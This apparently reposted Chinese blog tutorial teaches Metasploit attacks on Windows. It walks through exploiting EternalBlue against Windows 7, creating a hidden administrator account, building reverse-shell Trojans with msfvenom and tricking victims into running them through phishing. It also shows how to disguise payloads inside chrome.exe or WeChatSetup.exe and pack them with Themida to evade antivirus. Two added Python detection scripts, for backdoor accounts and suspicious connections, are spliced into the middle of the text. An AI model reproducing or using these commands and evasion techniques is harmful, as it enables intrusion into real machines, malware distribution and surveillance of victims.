[P3] The most powerful penetration tool - metasploit (detailed installation, configuration and usage tutorial)


Contents: what metasploit is, using metasploit to attack the Windows operating system, the full process of attacking EternalBlue with metasploit, generating a remote-control Trojan with the Kali penetration tool, a metasploit attack example, msfvenom anti-virus bypass techniques (bundled Trojans and packers), installing Themida on Windows, and a Themida usage tutorial.


1. What is metasploit?

Kali's most powerful penetration tool - metasploit

  • msf is an open source security vulnerability exploitation and testing tool that integrates common overflow vulnerabilities and popular shellcodes on various platforms and is continuously updated.

  • Metasploit makes the complex process of exploiting a vulnerability very simple. After a few hours of study, a computer novice can launch damaging attacks against mainstream vulnerabilities in operating systems and other software.

2. metasploit attacks Windows operating system

1. msfconsole: Start the metasploit command line [the command line is highly efficient and easy to use]

2. What you need to do before starting metasploit:

  • Open kali terminal

  • Use the sudo su command and enter kali's password kali to switch to the root user

  • Use the msfdb init command to initialize the metasploit database (*optional)

3. Operation steps:

(1) Use sudo su to switch to the root superuser; the password is kali (users without a root account need to create one themselves)

  • sudo su

Insert image description here

(2) msfconsole starts the metasploit command-line interface

  • msfconsole

Insert image description here

3. The full process of attacking EternalBlue with metasploit

EternalBlue refers to the events of the night of April 14, 2017, when the hacker group Shadow Brokers released a large batch of network attack tools, among them the "EternalBlue" tool, which exploits an SMB vulnerability in Windows to obtain the highest system privileges. On May 12, criminals modified "EternalBlue" to build the WannaCry ransomware; campus networks of many universities, large enterprise intranets and government agency private networks in the UK, Russia, the whole of Europe and China were hit, and the victims were extorted to pay high ransoms before their files could be decrypted and recovered.

1. Use the module: use exploit/windows/smb/ms17_010_eternalblue

2. Set the required options: view them with show options [the options whose Required column is yes]

3. Operation steps

(1) You can search for modules by number. Microsoft's identifier for EternalBlue is ms17_010

  • search ms17_010

Insert image description here

  • exploit: vulnerability attack script

As shown in the figure, you can use Description to see what the module does.

(2) Use the module

Two methods:

  • use module name

  • use module number

Insert image description here

(3) Configure the module: check the settings first, then tell msf whom to attack and what to do.

  • show options

Insert image description here

  • Required: you only need to configure the options whose Required column is yes.

  • RHOSTS: target address

  • RPORT: port, default 445

  • VERIFY_ARCH, VERIFY_TARGET: These two options are already configured, just keep the default

  • Payload options: the attack payload; the default windows/x64/meterpreter/reverse_tcp obtains command execution permission on the target machine. In other words: what do you want to do after the attack?

  • EXITFUNC: Already configured by default

  • LHOST: listening address, IP address of the attacking machine

  • LPORT: listening port

(4) Start the target machine (Win 7)

(5) Open cmd and use ipconfig to view the IP address of the target machine

  • ipconfig

Insert image description here

(6) On Kali, set the attack target address

  • set RHOSTS <target machine IP>

Insert image description here

(7) After the settings are completed, you can use show options again to check whether the configuration is complete.

  • show options

Insert image description here

As shown in the figure: check whether Current Setting is empty for each option whose Required column is yes. If none of them is empty, the configuration is complete.

(8) You can change the default listening port LPORT

  • set lport 22222

Insert image description here

Note: the port range is 0-65535


Extension: check whether the port is open

① Check whether port 445 is open

  • netstat -an

Insert image description here

② The firewall on the target machine must be turned off for this attack.

Insert image description here


(9) Run the module

  • run

Insert image description here

As shown in the figure, the target machine is attacked automatically and command execution permission is obtained. After the attack succeeds, WIN is printed first and then the meterpreter prompt appears.

meterpreter: we have obtained access to the Win 7 target machine

(10) You can use help to view the available commands.

Insert image description here

  • Command: command

  • Description: Description or explanation of the command

  • shutdown: shut down the target machine

  • User interface Commands: User interface commands

  • getdesktop: screenshot

  • keyscan: send keyboard commands

  • mouse: Send mouse commands

(11) Exit

  • exit

Insert image description here

4. What can metasploit do after a successful attack?

1. What can you do after a successful attack?

  • Meterpreter is a powerful post-penetration module. You can enter help to view the help information.

  • Remote control, command execution, webcam monitoring, password acquisition, creating backdoor users, destroying or tampering with the system... these seemingly complex and advanced operations can each be completed in meterpreter with a single line, or just a few letters and simple commands.

  • Example: create a backdoor user and enable remote (RDP) connection

    • shell

    • net user zhangsan 123456 /add && net localgroup administrators zhangsan /add

    • exit

    • run getgui -e
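The backdoor-user example above leaves a recognisable trace on the target. The following added detection example (not from the original post) correlates the two Windows Security events such a sequence produces; the event records are constructed and their field names are simplified.

```python
# Added detection example (not from the original post): flag an account that
# was created and then added to a privileged local group within a short window,
# the trace left by "net user ... /add && net localgroup administrators ... /add".
# Windows records this as Security events 4720 (user account created) and
# 4732 (member added to a security-enabled local group).
from datetime import datetime

# Constructed sample events; field names are simplified from the Security log
# and every value is made up for this example.
EVENTS = [
    {"time": "2023-06-20 10:01:00", "id": 4720, "target": "zhangsan",
     "subject": "victim-pc\\alice", "group": None},
    {"time": "2023-06-20 10:01:02", "id": 4732, "target": "zhangsan",
     "subject": "victim-pc\\alice", "group": "Administrators"},
    {"time": "2023-06-20 11:30:00", "id": 4720, "target": "svc_backup",
     "subject": "victim-pc\\itadmin", "group": None},
    {"time": "2023-06-21 09:00:00", "id": 4732, "target": "svc_backup",
     "subject": "victim-pc\\itadmin", "group": "Backup Operators"},
]

# Groups whose membership gives the kind of access meterpreter's getgui -e
# relies on (RDP) or full control of the host.
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}

def find_backdoor_admins(events, window_seconds=300):
    """Return (user, seconds_between_events, group) for every account that was
    created (4720) and added to a privileged group (4732) within the window."""
    created = {}
    for ev in events:
        if ev["id"] == 4720:
            created[ev["target"]] = datetime.fromisoformat(ev["time"])
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] != 4732 or ev["group"] not in PRIVILEGED_GROUPS:
            continue
        t0 = created.get(ev["target"])
        if t0 is None:
            continue  # added to a group but not freshly created: out of scope
        delta = (datetime.fromisoformat(ev["time"]) - t0).total_seconds()
        if 0 <= delta <= window_seconds:
            hits.append((ev["target"], int(delta), ev["group"]))
    return hits

if __name__ == "__main__":
    for user, secs, group in find_backdoor_admins(EVENTS):
        print(f"ALERT: {user} created and added to {group} {secs}s later")
```

Only the zhangsan sequence is reported: svc_backup is added to a non-privileged group and almost a day after creation, so it falls outside the window.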

2. Use the Kali penetration tool to generate remote control Trojans

(1) msfvenom is a tool for generating backdoors. The backdoor is executed on the target machine, and a listener on the local (attacking) machine receives the connection.

  • venom: poison, venom

  • [* msfvenom is used in the shell, not in the msfconsole terminal]

(2) Windows executable program backdoor:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o demo.exe

  • msfvenom: Tool used for execution

  • -p:payload

  • windows/x64/meterpreter/reverse_tcp: payload name, in the form system/architecture/function/method; to attack Linux, replace windows with linux (likewise android, mac)

  • lhost=192.168.123.136 lport=9999: payload settings (Kali address, Kali port)

  • -f:format

  • exe: exe, windows executable file (ipk, jar, war)

  • -o: output, the output file name, such as demo.exe

4.1. Operation steps

(1) Generate the Trojan file

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o demo.exe

Insert image description here

(2) As shown in the figure, the file is generated in the current directory

  • You can use ls to view

  • You can use pwd to view the absolute path of the working directory

Insert image description here

(3) You can use phishing websites to trick victims into clicking

Insert image description here

(4) Download the Trojan demo.exe to the local computer

When pulling it to the local machine, be sure to turn off the anti-virus software first.

When the Trojan is downloaded locally it will be intercepted by the anti-virus software; later you will need to make the Trojan bypass the anti-virus software.

Insert image description here

The Trojan cannot simply be run directly. Just like fishing, the Trojan needs to be placed on the fishhook first.

(5) Enter msfconsole from the terminal.

  • msfconsole

Insert image description here

(6) Use the exploit/multi/handler module

  • use exploit/multi/handler

Insert image description here

(7) View the settings

  • show options

  • Can be abbreviated to: options

Insert image description here

  • Payload options: attack payload settings (set to the payload_name used when generating the executable backdoor)

(8) Set the attack payload (set it to the payload_name used when generating the executable backdoor)

  • set payload windows/x64/meterpreter/reverse_tcp

Insert image description here

(9) Set the Kali address

  • set lhost 192.168.159.128

Insert image description here

(10) Set the port (it must match the lport used when generating the executable backdoor)

  • set lport 9999

Insert image description here

(11) You can use options to view the settings again.

Insert image description here

(12) Run

  • run

Insert image description here

Now that the fishhook has been cast into the river, there are two ways to wait for a fish to take the bait: 1. press the fish onto the hook, that is, exploit a vulnerability; 2. fish like Jiang Taigong and let the willing bite, that is, lure the victim into taking the bait.

(13) If the victim takes the bait, they double-click the local demo.exe file

Insert image description here

(14) As shown in the picture, the victim has taken the bait

Insert image description here

  • meterpreter: execution permission on the victim's computer has been obtained

(15) Enter help to view the commands that can be executed

  • help

Insert image description here
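Both the "check whether port 445 is open" extension above and the handler's reverse_tcp connection can be checked from the target host's side. The following added triage example (not the tutorial's own code) parses constructed netstat -ano output; the PID-to-image map stands in for tasklist output and is constructed too.

```python
# Added triage example (not from the original post). It parses `netstat -ano`
# output, constructed below, to answer two defender questions raised above: is
# port 445 listening on all interfaces (what the ms17_010 attack needs), and does
# any process hold an ESTABLISHED connection to an unusual remote port (how a
# reverse_tcp backdoor such as demo.exe looks once it has called home).

# Constructed sample of `netstat -ano` output; addresses and PIDs are made up.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.159.130:49700  52.96.0.10:443         ESTABLISHED     3120
  TCP    192.168.159.130:49723  192.168.159.128:9999   ESTABLISHED     5044
"""
# Constructed PID -> image name map (what `tasklist` would show).
PID_TO_IMAGE = {4: "System", 884: "svchost.exe", 3120: "chrome.exe",
                5044: "demo.exe"}
# Remote ports that ordinary workstation traffic is expected to use.
EXPECTED_REMOTE_PORTS = {53, 80, 88, 389, 443, 445, 636, 3389}

def parse_netstat(text):
    """Return (local_ip, local_port, remote_ip, remote_port, state, pid) per
    TCP line; the header and any UDP lines (no State column) are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        lip, lport = parts[1].rsplit(":", 1)
        rip, rport = parts[2].rsplit(":", 1)
        rows.append((lip, int(lport), rip, int(rport), parts[3], int(parts[4])))
    return rows

def smb_exposed(rows):
    """True if SMB (445) listens on every interface. The real fix for
    ms17_010 is the MS17-010 patch plus disabling SMBv1, not the firewall alone."""
    return any(lip in ("0.0.0.0", "[::]") and lport == 445 and state == "LISTENING"
               for lip, lport, _, _, state, _ in rows)

def suspicious_outbound(rows, pid_to_image):
    """Established connections to ports outside EXPECTED_REMOTE_PORTS, as
    (image, remote_ip, remote_port) tuples for an analyst to review."""
    return [(pid_to_image.get(pid, f"pid {pid}"), rip, rport)
            for _, _, rip, rport, state, pid in rows
            if state == "ESTABLISHED" and rport not in EXPECTED_REMOTE_PORTS]

if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    print("SMB exposed on all interfaces:", smb_exposed(rows))
    for image, rip, rport in suspicious_outbound(rows, PID_TO_IMAGE):
        print(f"REVIEW: {image} -> {rip}:{rport}")
```

The port allow-list is a starting heuristic: a backdoor can just as well use 443, so the process name and its location on disk still need a human look.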

4.2. Attack examples

(1) webcam_list: check whether the victim's computer has a camera

  • webcam_list

Insert image description here

(2). I am using a desktop computer, so there is no camera.

5. Tips for bypassing anti-virus software with msfvenom

Tested against the most basic anti-virus software [the effect on other anti-virus software differs; try it yourself for your specific circumstances] *

5.1. Bundling Trojans

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe

  • -x: template (which normal program to use as the template for generating the backdoor)

Note: if notepad++ does not get through, you can switch to other software; the executable program must exist in the path

  • -e / specify the encoding method used to re-encode the attack payload

  • -x / specify which executable program template the Trojan is bundled into

  • -i / specify how many times the target is encoded; multiple rounds of encoding in theory help achieve anti-virus evasion

  • -f / specify the output format of the msf encoder

  • -o / specify the output path of the processed file

Note: when using a bundled Trojan, the executable program must exist in the path

(1) In the directory where the Trojan is generated, first copy in an executable program, such as chrome.exe

Insert image description here

(2) Use msfvenom to generate a Trojan for the Windows environment and bundle it into chrome.exe, producing the combined file chrome01.exe

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

Other examples:

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai: multiple rounds of encoding used as the anti-virus evasion treatment

Insert image description here

(3) In this directory, you can see that the Trojan chrome01.exe has been generated.

Insert image description here

5.2. Packing: compression shells, encryption shells

5.2.1. Themida: Packing software
5.2.1.1. Install Themida under Linux

Note: this archive is a rar package; it must be extracted under Linux, but the software itself has to be used under Windows


Extension: unzip the rar package

(1) Reference tutorial for installing rar: https://blog.csdn.net/weixin_40293999/article/details/122733513

(2) Unzip the rar package

Insert image description here


5.2.1.2. Install Themida under Windows

Insert image description here

5.2.1.3. Themida usage tutorial

Insert image description here

Note: Themida.exe is the 32-bit version; Themida64.exe is the 64-bit version

(1) Open the downloaded Themida_x32_x64_v3.0.4.0_Repacked folder and double-click the Themida64.exe executable

Insert image description here

Insert image description here

(2) Drag the unpacked Trojan executable into the Themida software

Insert image description here

Insert image description here

  • You can also select the path of the Trojan file to import from within Themida

(3) Click Protect to pack

Note: close the anti-virus software before packing, and turn it back on after packing is complete

Insert image description here

Packing protection runs automatically. After success, a copy marked as protected (Protect added to the file name) is generated locally.

(4) As shown in the picture, packing is complete; click Close.

Insert image description here

Insert image description here


Origin blog.csdn.net/qq_45138120/article/details/131350703